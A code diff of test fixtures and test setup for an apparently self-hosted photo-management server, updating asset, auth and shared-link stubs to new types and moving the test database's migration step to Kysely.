albumUsers: [],
|
albumUsers: [],
|
||||||
isActivityEnabled: true,
|
isActivityEnabled: true,
|
||||||
order: AssetOrder.DESC,
|
order: AssetOrder.DESC,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
};
|
};
|
||||||
|
93
server/test/fixtures/asset.stub.ts
vendored
93
server/test/fixtures/asset.stub.ts
vendored
@ -1,5 +1,5 @@
|
|||||||
import { AssetFile, Exif } from 'src/database';
|
import { AssetFace, AssetFile, Exif } from 'src/database';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetFileType, AssetStatus, AssetType } from 'src/enum';
|
import { AssetFileType, AssetStatus, AssetType } from 'src/enum';
|
||||||
import { StorageAsset } from 'src/types';
|
import { StorageAsset } from 'src/types';
|
||||||
import { authStub } from 'test/fixtures/auth.stub';
|
import { authStub } from 'test/fixtures/auth.stub';
|
||||||
@ -26,13 +26,15 @@ const fullsizeFile: AssetFile = {
|
|||||||
|
|
||||||
const files: AssetFile[] = [fullsizeFile, previewFile, thumbnailFile];
|
const files: AssetFile[] = [fullsizeFile, previewFile, thumbnailFile];
|
||||||
|
|
||||||
export const stackStub = (stackId: string, assets: AssetEntity[]) => {
|
export const stackStub = (stackId: string, assets: (MapAsset & { exifInfo: Exif })[]) => {
|
||||||
return {
|
return {
|
||||||
id: stackId,
|
id: stackId,
|
||||||
assets,
|
assets,
|
||||||
ownerId: assets[0].ownerId,
|
ownerId: assets[0].ownerId,
|
||||||
primaryAsset: assets[0],
|
primaryAsset: assets[0],
|
||||||
primaryAssetId: assets[0].id,
|
primaryAssetId: assets[0].id,
|
||||||
|
createdAt: new Date('2023-02-23T05:06:29.716Z'),
|
||||||
|
updatedAt: new Date('2023-02-23T05:06:29.716Z'),
|
||||||
};
|
};
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -85,9 +87,12 @@ export const assetStub = {
|
|||||||
isExternal: false,
|
isExternal: false,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
|
|
||||||
noWebpPath: Object.freeze<AssetEntity>({
|
noWebpPath: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -122,9 +127,12 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
|
|
||||||
noThumbhash: Object.freeze<AssetEntity>({
|
noThumbhash: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -156,6 +164,9 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
|
|
||||||
primaryImage: Object.freeze({
|
primaryImage: Object.freeze({
|
||||||
@ -195,12 +206,13 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
stackId: 'stack-1',
|
stackId: 'stack-1',
|
||||||
stack: stackStub('stack-1', [
|
stack: stackStub('stack-1', [
|
||||||
{ id: 'primary-asset-id' } as AssetEntity,
|
{ id: 'primary-asset-id' } as MapAsset & { exifInfo: Exif },
|
||||||
{ id: 'stack-child-asset-1' } as AssetEntity,
|
{ id: 'stack-child-asset-1' } as MapAsset & { exifInfo: Exif },
|
||||||
{ id: 'stack-child-asset-2' } as AssetEntity,
|
{ id: 'stack-child-asset-2' } as MapAsset & { exifInfo: Exif },
|
||||||
]),
|
]),
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
@ -229,6 +241,9 @@ export const assetStub = {
|
|||||||
isExternal: false,
|
isExternal: false,
|
||||||
livePhotoVideo: null,
|
livePhotoVideo: null,
|
||||||
livePhotoVideoId: null,
|
livePhotoVideoId: null,
|
||||||
|
updateId: 'foo',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
sharedLinks: [],
|
sharedLinks: [],
|
||||||
originalFileName: 'asset-id.jpg',
|
originalFileName: 'asset-id.jpg',
|
||||||
faces: [],
|
faces: [],
|
||||||
@ -241,10 +256,10 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
libraryId: null,
|
stack: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
trashed: Object.freeze<AssetEntity>({
|
trashed: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
fileModifiedAt: new Date('2023-02-23T05:06:29.716Z'),
|
fileModifiedAt: new Date('2023-02-23T05:06:29.716Z'),
|
||||||
@ -281,9 +296,12 @@ export const assetStub = {
|
|||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
status: AssetStatus.TRASHED,
|
status: AssetStatus.TRASHED,
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
|
|
||||||
trashedOffline: Object.freeze<AssetEntity>({
|
trashedOffline: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -321,8 +339,10 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: true,
|
isOffline: true,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
archived: Object.freeze<AssetEntity>({
|
archived: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -359,9 +379,12 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
updateId: '42',
|
||||||
}),
|
}),
|
||||||
|
|
||||||
external: Object.freeze<AssetEntity>({
|
external: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -397,9 +420,12 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
|
stackId: null,
|
||||||
|
stack: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
image1: Object.freeze<AssetEntity>({
|
image1: Object.freeze({
|
||||||
id: 'asset-id-1',
|
id: 'asset-id-1',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -434,9 +460,13 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
|
stackId: null,
|
||||||
|
libraryId: null,
|
||||||
|
stack: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
imageFrom2015: Object.freeze<AssetEntity>({
|
imageFrom2015: Object.freeze({
|
||||||
id: 'asset-id-1',
|
id: 'asset-id-1',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -510,7 +540,9 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
livePhotoMotionAsset: Object.freeze({
|
livePhotoMotionAsset: Object.freeze({
|
||||||
@ -527,7 +559,7 @@ export const assetStub = {
|
|||||||
timeZone: `America/New_York`,
|
timeZone: `America/New_York`,
|
||||||
},
|
},
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
} as AssetEntity & { libraryId: string | null; files: AssetFile[]; exifInfo: Exif }),
|
} as MapAsset & { faces: AssetFace[]; files: AssetFile[]; exifInfo: Exif }),
|
||||||
|
|
||||||
livePhotoStillAsset: Object.freeze({
|
livePhotoStillAsset: Object.freeze({
|
||||||
id: 'live-photo-still-asset',
|
id: 'live-photo-still-asset',
|
||||||
@ -544,7 +576,8 @@ export const assetStub = {
|
|||||||
timeZone: `America/New_York`,
|
timeZone: `America/New_York`,
|
||||||
},
|
},
|
||||||
files,
|
files,
|
||||||
} as AssetEntity & { libraryId: string | null }),
|
faces: [] as AssetFace[],
|
||||||
|
} as MapAsset & { faces: AssetFace[] }),
|
||||||
|
|
||||||
livePhotoWithOriginalFileName: Object.freeze({
|
livePhotoWithOriginalFileName: Object.freeze({
|
||||||
id: 'live-photo-still-asset',
|
id: 'live-photo-still-asset',
|
||||||
@ -562,7 +595,8 @@ export const assetStub = {
|
|||||||
timeZone: `America/New_York`,
|
timeZone: `America/New_York`,
|
||||||
},
|
},
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
} as AssetEntity & { libraryId: string | null }),
|
faces: [] as AssetFace[],
|
||||||
|
} as MapAsset & { faces: AssetFace[] }),
|
||||||
|
|
||||||
withLocation: Object.freeze({
|
withLocation: Object.freeze({
|
||||||
id: 'asset-with-favorite-id',
|
id: 'asset-with-favorite-id',
|
||||||
@ -590,6 +624,9 @@ export const assetStub = {
|
|||||||
isVisible: true,
|
isVisible: true,
|
||||||
livePhotoVideo: null,
|
livePhotoVideo: null,
|
||||||
livePhotoVideoId: null,
|
livePhotoVideoId: null,
|
||||||
|
updateId: 'foo',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
sharedLinks: [],
|
sharedLinks: [],
|
||||||
originalFileName: 'asset-id.ext',
|
originalFileName: 'asset-id.ext',
|
||||||
faces: [],
|
faces: [],
|
||||||
@ -604,7 +641,7 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
libraryId: null,
|
tags: [],
|
||||||
}),
|
}),
|
||||||
|
|
||||||
sidecar: Object.freeze({
|
sidecar: Object.freeze({
|
||||||
@ -639,10 +676,12 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: 'foo',
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
sidecarWithoutExt: Object.freeze<AssetEntity>({
|
sidecarWithoutExt: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -676,7 +715,7 @@ export const assetStub = {
|
|||||||
isOffline: false,
|
isOffline: false,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
hasEncodedVideo: Object.freeze<AssetEntity>({
|
hasEncodedVideo: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
originalFileName: 'asset-id.ext',
|
originalFileName: 'asset-id.ext',
|
||||||
@ -711,9 +750,13 @@ export const assetStub = {
|
|||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
|
stack: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
hasFileExtension: Object.freeze<AssetEntity>({
|
hasFileExtension: Object.freeze({
|
||||||
id: 'asset-id',
|
id: 'asset-id',
|
||||||
status: AssetStatus.ACTIVE,
|
status: AssetStatus.ACTIVE,
|
||||||
deviceAssetId: 'device-asset-id',
|
deviceAssetId: 'device-asset-id',
|
||||||
@ -788,6 +831,9 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
}),
|
}),
|
||||||
|
|
||||||
imageHif: Object.freeze({
|
imageHif: Object.freeze({
|
||||||
@ -827,5 +873,8 @@ export const assetStub = {
|
|||||||
} as Exif,
|
} as Exif,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
isOffline: false,
|
isOffline: false,
|
||||||
|
updateId: '42',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
}),
|
}),
|
||||||
};
|
};
|
||||||
|
9
server/test/fixtures/auth.stub.ts
vendored
9
server/test/fixtures/auth.stub.ts
vendored
@ -1,6 +1,5 @@
|
|||||||
import { Session } from 'src/database';
|
import { Session } from 'src/database';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
|
|
||||||
const authUser = {
|
const authUser = {
|
||||||
admin: {
|
admin: {
|
||||||
@ -42,14 +41,16 @@ export const authStub = {
|
|||||||
id: 'token-id',
|
id: 'token-id',
|
||||||
} as Session,
|
} as Session,
|
||||||
}),
|
}),
|
||||||
adminSharedLink: Object.freeze<AuthDto>({
|
adminSharedLink: Object.freeze({
|
||||||
user: authUser.admin,
|
user: authUser.admin,
|
||||||
sharedLink: {
|
sharedLink: {
|
||||||
id: '123',
|
id: '123',
|
||||||
showExif: true,
|
showExif: true,
|
||||||
allowDownload: true,
|
allowDownload: true,
|
||||||
allowUpload: true,
|
allowUpload: true,
|
||||||
key: Buffer.from('shared-link-key'),
|
expiresAt: null,
|
||||||
} as SharedLinkEntity,
|
password: null,
|
||||||
|
userId: '42',
|
||||||
|
},
|
||||||
}),
|
}),
|
||||||
};
|
};
|
||||||
|
31
server/test/fixtures/shared-link.stub.ts
vendored
31
server/test/fixtures/shared-link.stub.ts
vendored
@ -1,10 +1,9 @@
|
|||||||
import { UserAdmin } from 'src/database';
|
import { UserAdmin } from 'src/database';
|
||||||
import { AlbumResponseDto } from 'src/dtos/album.dto';
|
import { AlbumResponseDto } from 'src/dtos/album.dto';
|
||||||
import { AssetResponseDto } from 'src/dtos/asset-response.dto';
|
import { AssetResponseDto, MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { ExifResponseDto } from 'src/dtos/exif.dto';
|
import { ExifResponseDto } from 'src/dtos/exif.dto';
|
||||||
import { SharedLinkResponseDto } from 'src/dtos/shared-link.dto';
|
import { SharedLinkResponseDto } from 'src/dtos/shared-link.dto';
|
||||||
import { mapUser } from 'src/dtos/user.dto';
|
import { mapUser } from 'src/dtos/user.dto';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { AssetOrder, AssetStatus, AssetType, SharedLinkType } from 'src/enum';
|
import { AssetOrder, AssetStatus, AssetType, SharedLinkType } from 'src/enum';
|
||||||
import { assetStub } from 'test/fixtures/asset.stub';
|
import { assetStub } from 'test/fixtures/asset.stub';
|
||||||
import { authStub } from 'test/fixtures/auth.stub';
|
import { authStub } from 'test/fixtures/auth.stub';
|
||||||
@ -113,12 +112,12 @@ export const sharedLinkStub = {
|
|||||||
allowUpload: true,
|
allowUpload: true,
|
||||||
allowDownload: true,
|
allowDownload: true,
|
||||||
showExif: true,
|
showExif: true,
|
||||||
album: undefined,
|
albumId: null,
|
||||||
|
album: null,
|
||||||
description: null,
|
description: null,
|
||||||
assets: [assetStub.image],
|
assets: [assetStub.image],
|
||||||
password: 'password',
|
password: 'password',
|
||||||
albumId: null,
|
}),
|
||||||
} as SharedLinkEntity),
|
|
||||||
valid: Object.freeze({
|
valid: Object.freeze({
|
||||||
id: '123',
|
id: '123',
|
||||||
userId: authStub.admin.user.id,
|
userId: authStub.admin.user.id,
|
||||||
@ -130,12 +129,12 @@ export const sharedLinkStub = {
|
|||||||
allowUpload: true,
|
allowUpload: true,
|
||||||
allowDownload: true,
|
allowDownload: true,
|
||||||
showExif: true,
|
showExif: true,
|
||||||
album: undefined,
|
|
||||||
albumId: null,
|
albumId: null,
|
||||||
description: null,
|
description: null,
|
||||||
password: null,
|
password: null,
|
||||||
assets: [],
|
assets: [] as MapAsset[],
|
||||||
} as SharedLinkEntity),
|
album: null,
|
||||||
|
}),
|
||||||
expired: Object.freeze({
|
expired: Object.freeze({
|
||||||
id: '123',
|
id: '123',
|
||||||
userId: authStub.admin.user.id,
|
userId: authStub.admin.user.id,
|
||||||
@ -150,9 +149,10 @@ export const sharedLinkStub = {
|
|||||||
description: null,
|
description: null,
|
||||||
password: null,
|
password: null,
|
||||||
albumId: null,
|
albumId: null,
|
||||||
assets: [],
|
assets: [] as MapAsset[],
|
||||||
} as SharedLinkEntity),
|
album: null,
|
||||||
readonlyNoExif: Object.freeze<SharedLinkEntity>({
|
}),
|
||||||
|
readonlyNoExif: Object.freeze({
|
||||||
id: '123',
|
id: '123',
|
||||||
userId: authStub.admin.user.id,
|
userId: authStub.admin.user.id,
|
||||||
key: sharedLinkBytes,
|
key: sharedLinkBytes,
|
||||||
@ -168,6 +168,7 @@ export const sharedLinkStub = {
|
|||||||
albumId: 'album-123',
|
albumId: 'album-123',
|
||||||
album: {
|
album: {
|
||||||
id: 'album-123',
|
id: 'album-123',
|
||||||
|
updateId: '42',
|
||||||
ownerId: authStub.admin.user.id,
|
ownerId: authStub.admin.user.id,
|
||||||
owner: userStub.admin,
|
owner: userStub.admin,
|
||||||
albumName: 'Test Album',
|
albumName: 'Test Album',
|
||||||
@ -239,17 +240,22 @@ export const sharedLinkStub = {
|
|||||||
colorspace: 'sRGB',
|
colorspace: 'sRGB',
|
||||||
autoStackId: null,
|
autoStackId: null,
|
||||||
rating: 3,
|
rating: 3,
|
||||||
|
updatedAt: today,
|
||||||
|
updateId: '42',
|
||||||
},
|
},
|
||||||
sharedLinks: [],
|
sharedLinks: [],
|
||||||
faces: [],
|
faces: [],
|
||||||
sidecarPath: null,
|
sidecarPath: null,
|
||||||
deletedAt: null,
|
deletedAt: null,
|
||||||
duplicateId: null,
|
duplicateId: null,
|
||||||
|
updateId: '42',
|
||||||
|
libraryId: null,
|
||||||
|
stackId: null,
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
},
|
},
|
||||||
}),
|
}),
|
||||||
passwordRequired: Object.freeze<SharedLinkEntity>({
|
passwordRequired: Object.freeze({
|
||||||
id: '123',
|
id: '123',
|
||||||
userId: authStub.admin.user.id,
|
userId: authStub.admin.user.id,
|
||||||
key: sharedLinkBytes,
|
key: sharedLinkBytes,
|
||||||
@ -263,6 +269,7 @@ export const sharedLinkStub = {
|
|||||||
password: 'password',
|
password: 'password',
|
||||||
assets: [],
|
assets: [],
|
||||||
albumId: null,
|
albumId: null,
|
||||||
|
album: null,
|
||||||
}),
|
}),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -1,10 +1,11 @@
|
|||||||
import { FileMigrationProvider, Kysely, Migrator } from 'kysely';
|
import { Kysely } from 'kysely';
|
||||||
import { mkdir, readdir } from 'node:fs/promises';
|
|
||||||
import { join } from 'node:path';
|
|
||||||
import { parse } from 'pg-connection-string';
|
import { parse } from 'pg-connection-string';
|
||||||
|
import { DB } from 'src/db';
|
||||||
|
import { ConfigRepository } from 'src/repositories/config.repository';
|
||||||
|
import { DatabaseRepository } from 'src/repositories/database.repository';
|
||||||
|
import { LoggingRepository } from 'src/repositories/logging.repository';
|
||||||
import { getKyselyConfig } from 'src/utils/database';
|
import { getKyselyConfig } from 'src/utils/database';
|
||||||
import { GenericContainer, Wait } from 'testcontainers';
|
import { GenericContainer, Wait } from 'testcontainers';
|
||||||
import { DataSource } from 'typeorm';
|
|
||||||
|
|
||||||
const globalSetup = async () => {
|
const globalSetup = async () => {
|
||||||
const postgresContainer = await new GenericContainer('tensorchord/pgvecto-rs:pg14-v0.2.0')
|
const postgresContainer = await new GenericContainer('tensorchord/pgvecto-rs:pg14-v0.2.0')
|
||||||
@ -36,66 +37,23 @@ const globalSetup = async () => {
|
|||||||
|
|
||||||
const postgresPort = postgresContainer.getMappedPort(5432);
|
const postgresPort = postgresContainer.getMappedPort(5432);
|
||||||
const postgresUrl = `postgres://postgres:postgres@localhost:${postgresPort}/immich`;
|
const postgresUrl = `postgres://postgres:postgres@localhost:${postgresPort}/immich`;
|
||||||
|
const parsed = parse(postgresUrl);
|
||||||
|
|
||||||
process.env.IMMICH_TEST_POSTGRES_URL = postgresUrl;
|
process.env.IMMICH_TEST_POSTGRES_URL = postgresUrl;
|
||||||
|
|
||||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
const db = new Kysely<DB>(
|
||||||
// @ts-expect-error
|
getKyselyConfig({
|
||||||
const modules = import.meta.glob('/src/migrations/*.ts', { eager: true });
|
|
||||||
|
|
||||||
const config = {
|
|
||||||
type: 'postgres' as const,
|
|
||||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
|
||||||
// @ts-expect-error
|
|
||||||
migrations: Object.values(modules).map((module) => Object.values(module)[0]),
|
|
||||||
migrationsRun: false,
|
|
||||||
synchronize: false,
|
|
||||||
connectTimeoutMS: 10_000, // 10 seconds
|
|
||||||
parseInt8: true,
|
|
||||||
url: postgresUrl,
|
|
||||||
};
|
|
||||||
|
|
||||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
|
||||||
// @ts-expect-error
|
|
||||||
const dataSource = new DataSource(config);
|
|
||||||
await dataSource.initialize();
|
|
||||||
await dataSource.runMigrations();
|
|
||||||
await dataSource.destroy();
|
|
||||||
|
|
||||||
// for whatever reason, importing from test/utils causes vitest to crash
|
|
||||||
// eslint-disable-next-line unicorn/prefer-module
|
|
||||||
const migrationFolder = join(__dirname, '..', 'schema/migrations');
|
|
||||||
// TODO remove after we have at least one kysely migration
|
|
||||||
await mkdir(migrationFolder, { recursive: true });
|
|
||||||
|
|
||||||
const parsed = parse(process.env.IMMICH_TEST_POSTGRES_URL!);
|
|
||||||
|
|
||||||
const parsedOptions = {
|
|
||||||
...parsed,
|
...parsed,
|
||||||
ssl: false,
|
ssl: false,
|
||||||
host: parsed.host ?? undefined,
|
host: parsed.host ?? undefined,
|
||||||
port: parsed.port ? Number(parsed.port) : undefined,
|
port: parsed.port ? Number(parsed.port) : undefined,
|
||||||
database: parsed.database ?? undefined,
|
database: parsed.database ?? undefined,
|
||||||
};
|
|
||||||
|
|
||||||
const db = new Kysely(getKyselyConfig(parsedOptions));
|
|
||||||
|
|
||||||
// TODO just call `databaseRepository.migrate()` (probably have to wait until TypeOrm is gone)
|
|
||||||
const migrator = new Migrator({
|
|
||||||
db,
|
|
||||||
migrationLockTableName: 'kysely_migrations_lock',
|
|
||||||
migrationTableName: 'kysely_migrations',
|
|
||||||
provider: new FileMigrationProvider({
|
|
||||||
fs: { readdir },
|
|
||||||
path: { join },
|
|
||||||
migrationFolder,
|
|
||||||
}),
|
}),
|
||||||
});
|
);
|
||||||
|
|
||||||
const { error } = await migrator.migrateToLatest();
|
const configRepository = new ConfigRepository();
|
||||||
if (error) {
|
const logger = new LoggingRepository(undefined, configRepository);
|
||||||
console.error('Unable to run kysely migrations', error);
|
await new DatabaseRepository(db, logger, configRepository).runMigrations();
|
||||||
throw error;
|
|
||||||
}
|
|
||||||
|
|
||||||
await db.destroy();
|
await db.destroy();
|
||||||
};
|
};
|
||||||
|
@ -39,9 +39,12 @@ describe(MemoryService.name, () => {
|
|||||||
it('should create a memory from an asset', async () => {
|
it('should create a memory from an asset', async () => {
|
||||||
const { sut, repos, getRepository } = createSut();
|
const { sut, repos, getRepository } = createSut();
|
||||||
|
|
||||||
const now = DateTime.fromObject({ year: 2025, month: 2, day: 25 }, { zone: 'utc' });
|
const now = DateTime.fromObject({ year: 2025, month: 2, day: 25 }, { zone: 'utc' }) as DateTime<true>;
|
||||||
const user = mediumFactory.userInsert();
|
const user = mediumFactory.userInsert();
|
||||||
const asset = mediumFactory.assetInsert({ ownerId: user.id, localDateTime: now.minus({ years: 1 }).toISO() });
|
const asset = mediumFactory.assetInsert({
|
||||||
|
ownerId: user.id,
|
||||||
|
localDateTime: now.minus({ years: 1 }).toISO(),
|
||||||
|
});
|
||||||
const jobStatus = mediumFactory.assetJobStatusInsert({ assetId: asset.id });
|
const jobStatus = mediumFactory.assetJobStatusInsert({ assetId: asset.id });
|
||||||
|
|
||||||
const userRepo = getRepository('user');
|
const userRepo = getRepository('user');
|
||||||
@ -86,7 +89,7 @@ describe(MemoryService.name, () => {
|
|||||||
it('should not generate a memory twice for the same day', async () => {
|
it('should not generate a memory twice for the same day', async () => {
|
||||||
const { sut, repos, getRepository } = createSut();
|
const { sut, repos, getRepository } = createSut();
|
||||||
|
|
||||||
const now = DateTime.fromObject({ year: 2025, month: 2, day: 20 }, { zone: 'utc' });
|
const now = DateTime.fromObject({ year: 2025, month: 2, day: 20 }, { zone: 'utc' }) as DateTime<true>;
|
||||||
|
|
||||||
const assetRepo = getRepository('asset');
|
const assetRepo = getRepository('asset');
|
||||||
const memoryRepo = getRepository('memory');
|
const memoryRepo = getRepository('memory');
|
||||||
|
@ -118,7 +118,7 @@ describe(MetadataService.name, () => {
|
|||||||
process.env.TZ = serverTimeZone ?? undefined;
|
process.env.TZ = serverTimeZone ?? undefined;
|
||||||
|
|
||||||
const { filePath } = await createTestFile(exifData);
|
const { filePath } = await createTestFile(exifData);
|
||||||
mocks.assetJob.getForMetadataExtraction.mockResolvedValue({ id: 'asset-1', originalPath: filePath } as never);
|
mocks.assetJob.getForMetadataExtraction.mockResolvedValue({ id: 'asset-1', originalPath: filePath } as any);
|
||||||
|
|
||||||
await sut.handleMetadataExtraction({ id: 'asset-1' });
|
await sut.handleMetadataExtraction({ id: 'asset-1' });
|
||||||
|
|
||||||
|
@ -11,7 +11,7 @@ export const newAssetRepositoryMock = (): Mocked<RepositoryInterface<AssetReposi
|
|||||||
upsertJobStatus: vitest.fn(),
|
upsertJobStatus: vitest.fn(),
|
||||||
getByDayOfYear: vitest.fn(),
|
getByDayOfYear: vitest.fn(),
|
||||||
getByIds: vitest.fn().mockResolvedValue([]),
|
getByIds: vitest.fn().mockResolvedValue([]),
|
||||||
getByIdsWithAllRelations: vitest.fn().mockResolvedValue([]),
|
getByIdsWithAllRelationsButStacks: vitest.fn().mockResolvedValue([]),
|
||||||
getByDeviceIds: vitest.fn(),
|
getByDeviceIds: vitest.fn(),
|
||||||
getByUserId: vitest.fn(),
|
getByUserId: vitest.fn(),
|
||||||
getById: vitest.fn(),
|
getById: vitest.fn(),
|
||||||
|
@ -2,7 +2,6 @@ import { randomUUID } from 'node:crypto';
|
|||||||
import {
|
import {
|
||||||
Activity,
|
Activity,
|
||||||
ApiKey,
|
ApiKey,
|
||||||
Asset,
|
|
||||||
AuthApiKey,
|
AuthApiKey,
|
||||||
AuthSharedLink,
|
AuthSharedLink,
|
||||||
AuthUser,
|
AuthUser,
|
||||||
@ -14,6 +13,7 @@ import {
|
|||||||
User,
|
User,
|
||||||
UserAdmin,
|
UserAdmin,
|
||||||
} from 'src/database';
|
} from 'src/database';
|
||||||
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { AssetStatus, AssetType, MemoryType, Permission, UserStatus } from 'src/enum';
|
import { AssetStatus, AssetType, MemoryType, Permission, UserStatus } from 'src/enum';
|
||||||
import { OnThisDayData } from 'src/types';
|
import { OnThisDayData } from 'src/types';
|
||||||
@ -184,7 +184,7 @@ const userAdminFactory = (user: Partial<UserAdmin> = {}) => {
|
|||||||
};
|
};
|
||||||
};
|
};
|
